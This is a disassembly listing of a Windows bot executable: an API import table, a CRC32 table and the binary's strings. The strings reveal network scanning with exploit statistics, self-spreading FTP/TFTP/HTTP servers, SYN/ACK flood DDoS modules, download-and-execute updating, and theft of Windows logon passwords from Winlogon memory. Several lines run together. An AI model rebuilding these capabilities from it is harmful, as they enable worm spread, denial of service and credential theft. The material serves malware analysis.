dword_422008 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_401141+272�r ...
dword_42200C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401141+255�r ...
dword_422010 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401141+180�r ...
dword_422014 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_401B94+264�r ...
dword_422018 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_41A142+D�r ...
dword_42201C dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_41A1D6+28�r ...
dword_422020 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_422024 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_401B94+254�r ...
dword_422028 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_405E13+F�r
dword_42202C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402C71+1EF�r ...
dword_422030 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_4021C5+1C3�r ...
dword_422034 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_402C71+5D�r ...
dword_422038 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_402858+1A7�r ...
dword_42203C dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_41267A+F8�r
dword_422040 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_403500+D9�r ...
dword_422044 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_402C71+485�r ...
dword_422048 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_405E13+21�r ...
dword_42204C dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_4035E0+144�r ...
dword_422050 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_4035E0+139�r ...
dword_422054 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA ; sub_404849+231�r
dword_422058 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403852+F5�r ...
dword_42205C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_4039DB+4A�r ...
dword_422060 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_4039DB+40�r ...
dword_422064 dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTime ; sub_404849+2AB�r
dword_422068 dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTime ; sub_404849+29D�r
dword_42206C dd 7C80B9A0h ; resolved to->KERNEL32.VirtualQueryEx ; sub_403B79+53�r
dword_422070 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_403B79+8D�r
dword_422074 dd 7C812D56h ; resolved to->KERNEL32.GetSystemInfo ; sub_403B79+2C�r ...
dword_422078 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_403B79+10�r ...
dword_42207C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_422080 dd 7C80F0F4h ; resolved to->KERNEL32.GetEnvironmentVariableWdword_422084 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_406217+11�r ...
dword_422088 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_406217+13A�r ...
dword_42208C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_41059C+B9�r ...
dword_422090 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; .text:00415018�r ...
dword_422094 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_4052D1+1F6�r ...
dword_422098 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; sub_412B6A+185�r
dword_42209C dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; sub_412B6A+16E�r
dword_4220A0 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_407576+10A�r ...
dword_4220A4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_407576+F6�r ...
dword_4220A8 dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_4220AC dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_4220B0 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_4220B4 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4220B8 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4220BC dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4220C0 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4220C4 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_4220C8 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_4220CC dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_408D49+293�r ...
dword_4220D0 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_409848+32DE�r
dword_4220D4 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_414199+61�r ...
dword_4220D8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; .text:004162F0�r ...
dword_4220DC dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; .text:00410EC7�r
dword_4220E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_410729+7D�r ...
dword_4220E4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_409848+3F56�r ...
dword_4220E8 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_408D49+24B�r ...
dword_4220EC dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_4220F0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_411D59+A3�r ...
dword_4220F4 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_4220F8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_420507+17�r
dword_4220FC dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_415F00+AC�r
dword_422100 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40FB4C+307�r
dword_422104 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_422108 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_42210C dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipe ; sub_41059C+101�r
dword_422110 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandle ; sub_4119DF+6B�r
dword_422114 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_411C5D+48�r ...
dword_422118 dd 7C81B58Bh ; resolved to->KERNEL32.SetConsoleCtrlHandlerdword_42211C dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_4202EF+23�r
dword_422120 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_412A3C+19�r ...
dword_422124 dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrivesdword_422128 dd 7C873A31h ; resolved to->KERNEL32.GenerateConsoleCtrlEventdword_42212C dd 7C80A05Dh ; resolved to->KERNEL32.WaitForMultipleObjectsdword_422130 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_422134 dd 7C8312E5h ; resolved to->KERNEL32.TransactNamedPipedword_422138 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_42213C dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_422140 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_422144 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_422148 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_420700+6�r
dword_42214C dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_422150 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_41F4FC:loc_41F552�r
dword_422154 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_422158 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_41E950+128�r ...
dword_42215C dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_417003+188�r ...
dword_422160 dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTime ; sub_420507+B�r
dword_422164 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_422168 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_41E0DB+5D�r
dword_42216C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_422170 dd 7C8136D7h ; resolved to->KERNEL32.TlsFreedword_422174 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_41EFD0+79�r
dword_422178 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_419240+55�r ...
dword_42217C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_419240+3D�r
dword_422180 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_422184 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_422188 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_42218C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_422190 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_422194 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_41A649+52�r ...
dword_422198 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_42219C dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_4221A0 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuery ; sub_41C0D8+71�r
dword_4221A4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_41C1A9+344�r ...
dword_4221A8 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_41C1A9+15B�r ...
dword_4221AC dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4221B0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4221B4 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_41D1D5+3D�r ...
dword_4221B8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_41E0DB+188�r
dword_4221BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4221C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4221C4 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsAdword_4221C8 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4221CC dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4221D0 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4221D4 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_41E0DB+196�r ...
dword_4221D8 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_421CFA+1CD�r
align 10h
dword_4221E0 dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_4221E4 dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_4221E8 dd 71AB3E00h ; resolved to->WS2_32.binddword_4221EC dd 71AB88D3h ; resolved to->WS2_32.listendword_4221F0 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_4042A2+58B�r
dword_4221F4 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4221F8 dd 71AC1028h ; resolved to->WS2_32.acceptdword_4221FC dd 71AB615Ah ; resolved to->WS2_32.recvdword_422200 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4042A2+119�r
dword_422204 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_4042A2+49�r
dword_422208 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4042A2+6F�r
dword_42220C dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_422210 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4042A2+B0�r
dword_422214 dd 71AB406Ah ; resolved to->WS2_32.connectdword_422218 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_404210+80�r ...
dword_42221C dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_404210+86�r
dd 2 dup(0)
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: start+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: start+42�o
align 4
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: start+11�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_4010CA+42�o
align 10h
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_4010CA+2C�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+384�o
align 4
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_401141+32E�o
; sub_409848+49DA�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+279�o
aFtpServerStart db '[FTP]: Server started on: %s:%d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+222�o
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+138�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+D8�o
; sub_409848+484A�o
align 10h
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4017E8+42�o
; sub_408894+3D�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_40195E+DC�o
align 10h
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_40195E+84�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_401B94+1F3�o
align 10h
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_401B94+17B�o
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401B94+116�o
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_401B94+A1�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_401E97+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_401E97+10�o
align 10h
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_401F0F+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_401FAF+1A�o
align 4
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_402021+DC�o
align 10h
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_402021+3F�o
align 10h
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4021C5+12�o
aWindow db 'Window',0 ; DATA XREF: sub_402402+23�o
; sub_4025FE+26�o
align 10h
dd 0
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_422990 dd 6272h ; sub_41326A+121�o ...
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_402858+2B7�o
align 10h
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_402858+122�o
; sub_409848+25A2�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_402858+108�o
; sub_409848+258E�o
align 4
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_402858+EE�o
; sub_409848+257A�o
align 4
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_402BA3+5B�o
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_402C71+4B6�o
align 10h
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_402C71+4A8�o
align 4
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_402C71+403�o
aDownloadExecut db '[DOWNLOAD]: Execution failed: Error executing file: %s.',0
; DATA XREF: sub_402C71:loc_403027�o
aDownloadApplic db '[DOWNLOAD]: Application succesfully executed: %s.',0
; DATA XREF: sub_402C71+3AC�o
align 10h
asc_422B00: ; DATA XREF: sub_402C71+346�o
; sub_40558B+25C�o ...
unicode 0, < >,0
aDownloadOpenni db '[DOWNLOAD]: Openning: %s %s.',0 ; DATA XREF: sub_402C71+2B4�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_402C71+24E�o
dbl_422B58 dq 9.765625e-4 ; DATA XREF: sub_402C71+21D�r
; sub_402C71:loc_402EAE�r ...
dbl_422B60 dq 4.294967296e9 ; DATA XREF: sub_402C71+215�r
; sub_402C71+237�r ...
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_402C71+195�o
align 4
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_402C71:loc_402DD4�o
align 4
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_402C71+15C�o
align 4
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_402C71+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_403217:loc_40325A�o
; sub_407D31+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_403217:loc_403254�o
aDisk db 'Disk',0 ; DATA XREF: sub_403217:loc_40324E�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_403217:loc_403248�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_403217:loc_403242�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_403217:loc_40323C�o
a?: ; DATA XREF: sub_403217+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_4032A8:loc_403380�o
; sub_4033C3+2D�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_4032A8+6C�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_4033C3+7B�o
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_4033C3+45�o
align 10h
aA db 'A:\',0 ; DATA XREF: sub_403482+39�o
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_4035E0+107�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_4035E0+45�o
; sub_40FB4C+195�o
align 4
aS_1 db '%s\*',0 ; DATA XREF: sub_4035E0+14�o
align 4
aFindfileFilesF db '[FINDFILE]: Files found: %d.',0 ; DATA XREF: sub_403732+CF�o
align 4
aFindfileSearch db '[FINDFILE]: Searching for file: %s.',0 ; DATA XREF: sub_403732+66�o
aMsgina db 'MSGINA',0 ; DATA XREF: sub_403852+13E�o
align 10h
aNwgina db 'NWGINA',0 ; DATA XREF: sub_403852+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_403852+B9�o
align 8
aFindpassTheWin db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403C9E+6A�o
; sub_403D30+A3�o
db ' \\%S, User: (%S/%S).',0
align 10h
aFindpassTheW_0 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403D30+C5�o
db ' \\%S, User: (%S/(N/A)).',0
align 4
aFindpassFailed db '[FINDPASS]: Failed to enable Debug Privilege.',0
; DATA XREF: sub_403E31:loc_403FA8�o
align 4
aFindpassUnab_0 db '[FINDPASS]: Unable to find Winlogon Process ID.',0
; DATA XREF: sub_403E31:loc_403F7C�o
aFindpassUnable db '[FINDPASS]: Unable to find the password in memory.',0
; DATA XREF: sub_403E31:loc_403F75�o
align 10h
aFindpassTheW_1 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_403E31+116�o
db ' \\%S, User: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_403E31+DB�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_403E31+CD�o
unicode 0, <USERNAME>,0
align 10h
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_403E31+99�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_403E31+8C�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_403E31+7F�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_403E31+72�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_403E31+67�o
align 10h
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_403E31+54�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_403E31+40�o
; sub_403E31+160�o ...
align 10h
aFindpassOnlySu db '[FINDPASS]: Only supported on Windows NT/2000.',0
; DATA XREF: sub_403E31+35�o
align 10h
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_4042A2+542�o
align 10h
aQuit db 'QUIT',0 ; DATA XREF: sub_4042A2+531�o
; sub_409848+5DA�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_4042A2+528�o
align 4
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_4042A2+4DC�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_4042A2+4C1�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_4042A2+491�o
align 10h
aRetr db 'RETR',0 ; DATA XREF: sub_4042A2:loc_40471C�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_4042A2+470�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_4042A2+45E�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_4042A2+42A�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_4042A2+3EC�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_4042A2:loc_404658�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_4042A2+38E�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_4042A2:loc_40461E�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_4042A2+350�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_4042A2:loc_4045DF�o
align 10h
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_4042A2+333�o
aI: ; DATA XREF: sub_4042A2+31E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_4042A2+302�o
aA_0: ; DATA XREF: sub_4042A2+2ED�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_4042A2:loc_40457B�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_4042A2+2CF�o
align 4
off_4231D8 dd offset dword_445750 ; DATA XREF: sub_4042A2+2BD�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_4042A2+2B1�o
align 10h
aRest db 'REST',0 ; DATA XREF: sub_4042A2:loc_404540�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_4042A2+294�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_4042A2:loc_404523�o
align 10h
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_4042A2+277�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_4042A2:loc_404506�o
align 10h
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_4042A2+25A�o
align 4
aUser_0 db 'USER',0 ; DATA XREF: sub_4042A2+247�o
align 10h
aSS_1 db '%s %s',0 ; DATA XREF: sub_4042A2+236�o
align 4
a220Winftpd1_2 db '220 WinFtpd 1.2',0Ah,0 ; DATA XREF: sub_4042A2+1BA�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
